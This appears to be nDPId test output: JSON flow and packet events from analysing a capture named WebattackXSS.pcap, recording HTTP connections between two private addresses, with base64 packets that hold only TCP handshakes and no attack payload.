+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347393135,"flow_last_seen":1499347398725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56710,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347393135,"flow_last_seen":1499347398725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56710,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347394398,"flow_last_seen":1499347399725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56724,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347394398,"flow_last_seen":1499347399725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56724,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347395736,"flow_last_seen":1499347401725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56738,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347395736,"flow_last_seen":1499347401725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347398258,"flow_last_seen":1499347403725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56764,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347398258,"flow_last_seen":1499347403725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56764,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347399514,"flow_last_seen":1499347404726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56778,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347399514,"flow_last_seen":1499347404726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4666,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347527425,"flow_last_seen":1499347527425,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347527425,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4666,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":1,"flow_last_seen":1499347527425,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347527425,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84vtAAD4G4tSsEAABwKgKMuMgAFAAyeh3AAAAAKACchCGiwAAAgQFtAQCCAoBOwqMAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4667,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":2,"flow_last_seen":1499347527425,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347527425,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4yBtIXfPAMnoeKAScSDCkwAAAgQFtAQCCAoD5NwBATsKjAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":3,"flow_last_seen":1499347527426,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347527426,"pkt":"ABm5CmnxAMGxFOsxCABFAAA04vxAAD4G4tusEAABwKgKMuMgAFAAyeh4bSF30IAQAOVhmwAAAQEICgE7CowD5NwB"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4678,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347528679,"flow_last_seen":1499347528679,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347528679,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4678,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":1,"flow_last_seen":1499347528679,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347528679,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86w9AAD4G2sCsEAABwKgKMuMuAFDPaODJAAAAAKACchC+UQAAAgQFtAQCCAoBOwvGAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4679,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":2,"flow_last_seen":1499347528679,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347528679,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4y4jZsPUz2jgyqAScSD21QAAAgQFtAQCCAoD5N07ATsLxgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4680,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":3,"flow_last_seen":1499347528680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347528680,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06xBAAD4G2sesEAABwKgKMuMuAFDPaODKI2bD1YAQAOWV3QAAAQEICgE7C8YD5N07"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4701,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347531303,"flow_last_seen":1499347531303,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347531303,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4701,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":1,"flow_last_seen":1499347531303,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347531303,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MvhAAD4GktisEAABwKgKMuNIAFARgDytAAAAAKACchAdrgAAAgQFtAQCCAoBOw5VAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":2,"flow_last_seen":1499347531303,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347531303,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ40hb80TSEYA8rqAScSCaFwAAAgQFtAQCCAoD5N\/LATsOVQEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4703,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":3,"flow_last_seen":1499347531304,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347531304,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MvlAAD4Gkt+sEAABwKgKMuNIAFARgDyuW\/NE04AQAOU5HgAAAQEICgE7DlYD5N\/L"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4713,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347532560,"flow_last_seen":1499347532560,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347532560,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4713,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":1,"flow_last_seen":1499347532560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347532560,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ro1AAD4GF0OsEAABwKgKMuNWAFA1F6EdAAAAAKACchCUXQAAAgQFtAQCCAoBOw+QAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":2,"flow_last_seen":1499347532560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347532560,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ41Zu3G2tNRehHqAScSDTyAAAAgQFtAQCCAoD5OEFATsPkAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4715,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":3,"flow_last_seen":1499347532561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347532561,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ro5AAD4GF0qsEAABwKgKMuNWAFA1F6EebtxtroAQAOVy0AAAAQEICgE7D5AD5OEF"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4734,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347535081,"flow_last_seen":1499347535081,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347535081,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4734,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":1,"flow_last_seen":1499347535081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347535081,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vMpAAD4GCQasEAABwKgKMuNwAFAre67MAAAAAKACchCNugAAAgQFtAQCCAoBOxIGAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4735,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":2,"flow_last_seen":1499347535081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347535081,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ43Bd+kT3K3uuzaAScSAESAAAAgQFtAQCCAoD5ON7ATsSBgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4736,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":3,"flow_last_seen":1499347535081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347535081,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vMtAAD4GCQ2sEAABwKgKMuNwAFAre67NXfpE+IAQAOWjTwAAAQEICgE7EgYD5ON7"} +00575{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":4740,"source":"WebattackXSS.pcap","alias":"nDPId-test","packets-captured":4740,"packets-processed":4739,"total-skipped-flows":0,"total-l4-data-len":2075670,"total-not-detected-flows":0,"total-guessed-flows":242,"total-detected-flows":13,"total-detection-updates":0,"total-updates":0,"current-active-flows":82,"total-active-flows":334,"total-idle-flows":252,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1846,"global_ts_msec":1499347536104} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347536332,"flow_last_seen":1499347536332,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536332,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":1,"flow_last_seen":1499347536332,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347536332,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iGJAAD4GPW6sEAABwKgKMuN+AFBSPZtdAAAAAKACchB5IAAAAgQFtAQCCAoBOxM\/AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4744,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":2,"flow_last_seen":1499347536332,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347536332,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ434l0Xf0Uj2bXqAScSDzoAAAAgQFtAQCCAoD5OS0ATsTPwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4745,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":3,"flow_last_seen":1499347536333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347536333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iGNAAD4GPXWsEAABwKgKMuN+AFBSPZteJdF39YAQAOWSqAAAAQEICgE7Ez8D5OS0"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347400752,"flow_last_seen":1499347406726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56792,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347400752,"flow_last_seen":1499347406726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347403327,"flow_last_seen":1499347408726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56818,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347403327,"flow_last_seen":1499347408726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56818,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347404575,"flow_last_seen":1499347409726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56832,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347404575,"flow_last_seen":1499347409726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347407100,"flow_last_seen":1499347412728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56858,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347407100,"flow_last_seen":1499347412728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56858,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347408367,"flow_last_seen":1499347413728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56872,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347408367,"flow_last_seen":1499347413728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56872,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347409644,"flow_last_seen":1499347414728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56886,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 